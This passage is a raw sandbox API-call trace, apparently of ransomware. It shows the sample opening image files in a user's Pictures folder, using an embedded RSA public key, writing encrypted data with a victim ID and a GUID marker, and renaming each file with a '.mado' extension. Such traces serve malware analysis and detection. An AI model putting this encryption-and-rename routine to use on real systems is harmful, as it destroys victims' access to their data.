(HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c64e8 | out: hHeap=0x2c0000) returned 1 [0205.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75c80 [0205.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75b78 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb08 [0205.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79968 [0205.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79980 [0205.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79998 [0205.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799b0 [0205.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799c8 [0205.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799e0 [0205.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79968 | out: hHeap=0x2c0000) returned 1 [0205.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79968 [0205.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feb08 | out: hHeap=0x2c0000) returned 1 [0205.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72db0 [0205.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799e0 | out: hHeap=0x2c0000) returned 1 [0205.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b72b80 [0205.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72c98 [0205.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79968 | out: hHeap=0x2c0000) returned 1 [0205.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74b68 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72db0 | out: hHeap=0x2c0000) returned 1 [0205.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75a70 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321958 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75c80 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a70 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799c8 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799b0 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79980 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79998 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75d88 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaf0 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66b70 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b78 | out: hHeap=0x2c0000) returned 1 [0205.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72ec8 | out: hHeap=0x2c0000) returned 1 [0205.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.949] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x5388, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x5388, lpOverlapped=0x0) returned 1 [0205.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0205.949] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x538d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.949] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0205.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0205.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0205.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0205.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0205.949] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0205.950] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.950] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.950] CloseHandle (hObject=0x63c) returned 1 [0205.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77968 [0205.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3b74b68 [0205.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77968 | out: hHeap=0x2c0000) returned 1 [0205.951] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\5DSZWpKJg8HwZKscy\\s6TOCeaG8kF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\5dszwpkjg8hwzkscy\\s6toceag8kf.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\5DSZWpKJg8HwZKscy\\s6TOCeaG8kF.gif.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\5dszwpkjg8hwzkscy\\s6toceag8kf.gif.mado")) returned 1 [0205.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.952] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.953] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53df9bc0, ftCreationTime.dwHighDateTime=0x1d5e6da, ftLastAccessTime.dwLowDateTime=0xe426e910, ftLastAccessTime.dwHighDateTime=0x1d5dc74, ftLastWriteTime.dwLowDateTime=0xe426e910, ftLastWriteTime.dwHighDateTime=0x1d5dc74, nFileSizeHigh=0x0, nFileSizeLow=0x6d86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="twzpeyokHxbtlRxCOjj.png", cAlternateFileName="TWZPEY~1.PNG")) returned 1 [0205.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xee) returned 0x32b69d8 [0205.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.953] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\5DSZWpKJg8HwZKscy\\twzpeyokHxbtlRxCOjj.png") returned=".png" [0205.953] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\5DSZWpKJg8HwZKscy\\twzpeyokHxbtlRxCOjj.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\5dszwpkjg8hwzkscy\\twzpeyokhxbtlrxcojj.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.953] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=28038) returned 1 [0205.953] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.956] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x6d60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.956] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.957] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.957] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x6d86, lpOverlapped=0x0) returned 1 [0205.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.958] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0205.959] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.959] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.959] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.959] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.959] GetLastError () returned 0x0 [0205.959] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.959] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0205.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.959] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.959] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.959] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x6d90) returned 0x3b81690 [0205.959] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66b70 [0205.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaf0 [0205.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66bb8 [0205.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb08 [0205.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79968 [0205.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79980 [0205.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79998 [0205.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0205.960] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0205.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0205.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79968 | out: hHeap=0x2c0000) returned 1 [0205.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79998 | out: hHeap=0x2c0000) returned 1 [0205.961] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x6d86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.961] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.961] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.961] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.961] CloseHandle (hObject=0x63c) returned 1 [0205.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6360 [0205.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8d0) returned 0x3b74b68 [0205.962] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\5DSZWpKJg8HwZKscy\\twzpeyokHxbtlRxCOjj.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\5dszwpkjg8hwzkscy\\twzpeyokhxbtlrxcojj.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\5DSZWpKJg8HwZKscy\\twzpeyokHxbtlRxCOjj.png.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\5dszwpkjg8hwzkscy\\twzpeyokhxbtlrxcojj.png.mado")) returned 1 [0205.963] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53df9bc0, ftCreationTime.dwHighDateTime=0x1d5e6da, ftLastAccessTime.dwLowDateTime=0xe426e910, ftLastAccessTime.dwHighDateTime=0x1d5dc74, ftLastWriteTime.dwLowDateTime=0xe426e910, ftLastWriteTime.dwHighDateTime=0x1d5dc74, nFileSizeHigh=0x0, nFileSizeLow=0x6d86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="twzpeyokHxbtlRxCOjj.png", cAlternateFileName="TWZPEY~1.PNG")) returned 0 [0205.963] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 